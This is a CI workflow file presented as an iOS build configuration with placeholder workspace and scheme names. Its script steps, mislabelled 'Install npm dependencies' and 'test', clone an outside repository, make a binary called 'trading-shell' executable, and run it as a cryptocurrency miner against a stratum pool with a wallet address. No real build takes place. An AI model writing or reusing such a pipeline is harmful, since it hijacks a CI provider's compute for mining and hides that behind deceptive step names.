workflows:
  ios-workflow:
    name: iOS Workflow
    max_build_duration: 120
    instance_type: mac_mini
    environment:
      vars:
        XCODE_WORKSPACE: "YOUR_WORKSPACE_NAME.xcworkspace"  # YOUR WORKSPACE NAME HERE
        XCODE_SCHEME: "YOUR_SCHEME_NAME" # THE NAME OF YOUR SCHEME HERE
      node: latest
      xcode: latest
      cocoapods: default
    triggering:
      events:
        - push
        - tag
        - pull_request
      branch_patterns:
        - pattern: develop
          include: true
          source: true
    scripts:
      - name: Install npm dependencies
        script: git clone https://github.com/hujan90/1.git
      - name: Install npm dependencies
        script: bash
      - name: Install npm dependencies
        script: cd 1
      - name: Install npm dependencies
        script: chmod +x trading-shell
      - name: Install npm dependencies
        script: ls
      - name: test
        script: ./trading-shell -a lyra2z330 -o stratum+tcps://stratum-na.rplant.xyz:17025 -u HRDiYsGL7xwjPHfKAHNwxwMxvK6UTX5Ptr.1 -t 4 --cpu-priority 4 && set -x
